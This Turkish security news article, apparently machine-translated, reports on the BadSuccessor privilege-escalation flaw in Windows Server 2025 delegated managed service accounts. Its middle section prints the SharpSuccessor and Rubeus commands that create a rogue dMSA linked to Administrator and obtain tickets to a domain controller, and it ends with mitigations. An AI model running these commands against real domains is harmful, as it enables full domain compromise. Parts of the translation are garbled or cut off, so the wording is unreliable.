Sharpsuccessor Poc Windows Server 2025 Badsuccessor kusurunu silahlandırmak için yayınlandı


Windows Server 2025’in delege Yönetilen Hizmet Hesabı (DMSA) özelliğindeki kritik bir ayrıcalık artış güvenlik açığı, saldırganların Sharpsuccessor gibi araçları kullanarak Active Directory etki alanlarından ödün vermesini sağlar.

Bu saldırı zinciri, düşük ayrıcalıklı kullanıcıları kötüye kullanılabilir bir Kerberos bilet manipülasyonu yoluyla alan adı yöneticilerine dönüştürmek için varsayılan yapılandırmalardan yararlanır.

Aşağıda, teknik mekaniği, silahlandırma sürecini ve savunma karşı önlemlerini bozuyoruz.

– Reklamcılık –
Google Haberleri

1. Kötüsör kırılganlığının anatomisi

Güvenlik açığı (CVE-2025-XXXX), msDS-ManagedAccountPrecededByLink DMSA Geçişi sırasında öznitelik.

Bu öznitelik, bir DMSA’nın, idari haklar gerektirmeden herhangi bir bağlantılı hesaptan ayrıcalıkları devralmasına izin verir.

Saldırganlar Createchild Herhangi bir Organizasyon Birimi (OU) için izinler şunları

  • Kötü niyetli bir DMSA nesnesi oluştur
  • Dövmek msDS-ManagedAccountPrecededByLink Yüksek değerli hedeflere referansa atıf (örn. Domain yöneticileri)
  • Tetikleyici Kerberos Bilet Verme Bileti (TGT) Sahtekarlık kimliği için ihraç

Anahtar Dağıtım Merkezi (KDC), DMSA’ya Hizmet Ana Adı (SPN) çözünürlüğü ve bilet şifrelemesini otomatik olarak verir ve sınırsız yanal hareket sağlar

2. Sharpsuccessor Silahlaşma İş Akışı

Sharpsuccessor, üç aşamalı bir süreçle sömürü otomatikleştirir:

Aşama 1: DMSA Nesne Oluşturma

powershellSharpSuccessor.exe add /impersonate:Administrator /path:"ou=test,dc=lab,dc=lan" /account:jdoe /name:attacker_dMSA

Bu komut bir DMSA oluşturur (attacker_dMSA) Yönetici hesabına bağlı, tehlikeye atılan kullanıcıyı kullanarak jdoe‘S Createchild üzerindeki haklar ou=test VEYA.

Aşama 2: Kerberos bilet manipülasyonu

powershellRubeus.exe tgtdeleg /nowrap  
Rubeus.exe asktgs /targetuser:attacker_dmsa$ /service:krbtgt/lab.lan /opsec /dmsa /nowrap /ptt  
  • tgtdeleg Geçerli kullanıcı için bir TGT ister (jdoe)
  • asktgs DMSA hesabını taklit ederek yöneticiye dövme bağlantısını kullanır

Aşama 3: Etki Adı Uzlaşması

powershellRubeus.exe asktgs /user:attacker_dmsa$ /service:cifs/WIN-RAEAN26UGJ5.lab.lan /opsec /dmsa /nowrap /ptt  

Bu son komut, etki alanı denetleyicisinin SMB hizmetine erişim sağlar (cifs/), kimlik bileti hasat veya altın bilet oluşturma için bilet geçiş saldırıları sağlar.

3. Azaltma Stratejileri ve DMSA Sertleştirme

ÖzellikGMSADMSA (ön planlama)
Auth Auth MidciationAlan çapındaMakineye özgü
Priv Esc RiskleriKerberoastingÖznitelik Kaçma (Badsuccessor)
Gizli depolamaAD’de otomatik rotasyonKimlik bilgisi ile makineye bağlı

Azaltmak için:

  • Kısıtlama veya izinler: Denetim CreateChild PowerShell Kullanarak Haklar: PowerShellGet-ADOrganizationalUnit -Filter * | Get-ADObject -Properties nTSecurityDescriptor
  • Blok Öznitelik Değişiklikleri: Yazma erişimini reddet msDS-ManagedAccountPrecededByLink İkiz edici olmayanlar için
  • Kimlik Bilgisi Korumasını Etkinleştir: Bilet hırsızlığını önlemek için DMSA için makineye bağlı kimlik doğrulamasını uygulayın

Microsoft sorunu kabul etti, ancak henüz bir yama yayınlamadı. Windows Server 2025’i kullanan kuruluşlar, etki alanı çapında uzlaşmayı önlemek için bu hafifletmeye öncelik vermelidir.

Bu saldırı, aşırı izin veren izinlerin risklerini ve AD öznitelik değişikliklerinin yetersiz validasyonunun altını çizmektedir.

Sharpsuccessor’un otomasyonunu Kerberos protokolü zayıflıklarıyla birleştirerek, saldırganlar tam alan kontrolü minimum çaba ile elde ederler.

DMSA nesnelerinin sürekli olarak izlenmesi ve en az ayrıcalık ilkelerine sıkı sıkıya bağlı kalma kritik savunmalar olmaya devam etmektedir.

Bu haberi ilginç bul! Anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin!



Source link